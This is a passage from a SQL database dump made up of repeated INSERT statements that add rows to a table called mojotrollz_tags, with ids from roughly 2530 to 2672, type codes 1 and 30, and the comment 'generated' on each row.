0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2530, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2531, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2532, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2532, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2533, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2533, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2534, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2534, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2535, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2535, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2536, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2536, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2537, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2537, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2540, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2541, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2541, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2542, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2542, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2543, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2543, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2544, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2544, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2545, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2545, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2546, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2546, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2547, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2547, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2548, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2548, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2549, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2549, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2550, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2550, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2551, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2551, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2552, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2552, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2553, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2553, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2554, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2554, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2555, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2555, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2556, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2556, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2557, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2557, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2558, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2558, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2559, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2559, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2560, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2560, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2561, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2561, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2562, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2562, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2563, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2563, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2564, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2564, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2565, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2565, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2566, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2566, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2567, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2567, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2569, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2569, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2570, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2570, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2571, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2571, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2572, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2572, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2573, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2573, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2574, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2574, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2575, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2575, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2577, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2577, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2578, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2578, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2579, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2579, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2580, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2580, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2581, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2581, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2582, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2582, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2583, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2583, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2584, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2584, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2585, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2585, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2586, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2586, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2587, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2587, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2588, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2588, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2589, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2589, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2590, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2590, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2591, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2591, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2592, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2592, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2594, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2594, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2595, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2595, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2596, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2596, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2597, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2597, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2598, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2598, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2599, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2599, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2600, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2600, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2601, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2601, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2602, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2602, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2603, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2603, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2604, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2604, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2605, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2605, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2606, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2606, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2607, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2607, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2608, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2608, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2609, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2609, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2610, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2610, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2611, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2611, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2612, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2612, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2616, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2616, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2618, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2618, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2619, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2619, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2620, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2620, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2621, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2621, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2622, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2622, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2623, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2624, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2625, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2625, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2626, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2626, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2627, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2627, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2628, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2628, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2630, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2634, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2634, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2635, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2635, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2636, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2636, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2638, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2639, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2639, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2640, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2640, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2641, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2641, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2642, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2642, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2643, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2643, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2644, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2644, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2645, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2645, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2646, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2646, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2647, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2647, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2648, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2648, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2649, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2649, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2650, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2650, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2651, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2651, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2652, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2652, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2653, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2653, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2654, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2654, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2655, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2655, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2656, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2656, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2657, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2657, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2658, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2658, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2659, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2659, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2663, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2663, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2664, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2664, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2667, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2668, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2668, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2669, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2669, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2670, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2670, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2671, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2672, 1, 1, 0, 